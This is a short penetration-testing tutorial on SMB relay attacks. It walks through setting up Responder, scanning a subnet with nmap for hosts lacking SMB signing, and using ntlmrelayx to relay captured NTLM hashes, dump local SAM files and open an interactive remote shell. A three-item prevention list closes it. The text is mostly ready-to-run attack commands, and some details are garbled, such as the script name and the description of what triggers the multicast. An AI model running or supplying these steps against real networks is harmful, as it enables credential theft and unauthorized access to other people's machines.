SMB relay attack

What is an SMB relay attack

When a user enters the IP address of a machine that does not exist on the network it sends out a multicast asking other computers if they know who has the IP address. Our listener replies to that request saying that we know the address and thus gets sent the requesting users hash to pass it on for them. The reason this works so frequently is that by default SMB does not perform Message signing on workstations. IE: It is not checking that the user requesting the share actually belongs on the domain. By default message signing is turned on for servers. By default it is either not turned on for workstations or is on but not required.

This attack only works if we are a local admin on both machines. The machine requesting the file share and also the machine that we are relaying the hash to and logging in.

Configuring Responder

Because we have to relay the hash instead of just capturing it responder needs to have both the SMB server turned off and HTTP turned off. Edit the responder config file in /etc/responder/Responder.conf and turn off SMB and HTTP and then start responder with sudo responder -I eth0 -rdw -v
Responder should now look like this:

Scan for IP address with SMB Message Signing turned off

nmap comes with a script for checking message signing called smb2-security-mode.nse. Scan the subnet using this script and add the IP addresses that do not use message signing into a target folder. sudo nmap -p445, 139 –script=smb2 security-mode.nse -T4 192.168.1.0/24

Setup the relay script

The tool used for relaying the hash is called ntlmrelayx.py. Run it with your target file and smb2support sudo ntlmrelayx.py -tf targets.txt -smb2support

Capturing the hash, relaying it and dumping the local SAM file

Request a share that does not exist using an admin account. Notice how the script checks if Remote Registry is enabled and if not, enables it, dumps the SAM and then re-disables it.
Additionally, gaining a remote shell via this attack is as easy as adding a -i switch to the end of our ntlmrelayx command: sudo ntlmrelayx.py -tf targets.txt -smb2support -i

Prevention

  • Enable SMB Signing on all devices. This can be done via Group Policy
  • Disable NTLM authentication on the network. Use Kerberos instead.
  • Limit Domain Admins to specific task